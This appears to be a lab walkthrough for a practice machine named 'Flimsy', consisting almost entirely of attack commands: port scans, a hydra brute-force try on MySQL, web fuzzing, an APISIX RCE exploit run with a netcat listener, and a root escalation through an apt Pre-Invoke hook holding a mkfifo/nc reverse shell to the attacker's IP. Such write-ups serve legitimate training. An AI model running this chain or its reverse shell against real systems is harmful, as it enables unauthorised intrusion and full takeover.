                                                                             Flimsy Walkthrough

Attacker's Machine: 192.168.45.5
Victim's Machine: 192.168.232.220
export IP=192.168.232.220
	
1. nmap -Pn -p- -n  --min-rate 1000 $IP --stats-every=5s
2. nmap -Pn -n -sC -sV -p22,8,3306,43500 $IP --open --stats-every=5s -oN results.txt

22/tcp    open  ssh                 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http                OpenResty web app server 1.21.4.1
3306/tcp  open  mysql            MySQL (unauthorized)
9443/tcp  open  ssl/tungsten-https?
43500/tcp open  http              OpenResty web app server

Service Info: OS: Linux


3. nmap -sU -n -Pn $IP --top-ports=100 --stats-every=5s --min-rate 1000   <!-- nothing -->

nmap -n $IP -p 80 -sV --script vuln --stats-every=5s 
nikto --url $IP -p 43500
nikto --url $IP 

Port 3306
hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql -s 3306 -e nsr       // [ERROR] Host '192.168.45.5' is not allowed to connect to this MySQL server 

Port 80 Enumeration
Files  <!-- nothing -->
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,429 -t 30 -R3 "http://$IP/FUZZ"
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -t 30 "http://$IP/FUZZ"
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 -t 30 "http://$IP/FUZZ"
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/big.txt  -o gobuster.txt -t 50 -x zip,php,txt 

Directories <!-- nothing -->
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404 -t 30 "http://$IP/FUZZ/"
wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 404 -t 30 "http://$IP/FUZZ/"
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "http://$IP/FUZZ/"

Port 43500 Enumeration  <!-- nothing -->

Check the page source and server headers

Discovered APISIX 2.8 header on port 43500

searchsploit APISIX          // Apache APISIX 2.12.1 - Remote Code Execution (RCE)
nc -lnvp 4444
python3 50829.py http://192.168.232.220:43500/ 192.168.45.5 4444

Got Shell!

Privilege Escalation

cat /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root apt-get update
* * * * * root /root/run.sh


The apt-get update settings can be managed in the location etc/apt/apt.conf.d.
It doesn't really matter if you decide to update an existing file or create a new file of your choosing for the command to be executed. But since most likely you won't have rights to edit the existing configuration files, you will probably need to create a new file contains a new line in which you tell that a specific script will be executing before executing the update command.

cd /etc/apt/apt.conf.d
cat new_script            
nc -lvnp 1234
apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.5 1234 >/tmp/f"};  

whoami
root
cd /root
cat proof.txt     // 2de56538e38a8637964f01fb5da2b690
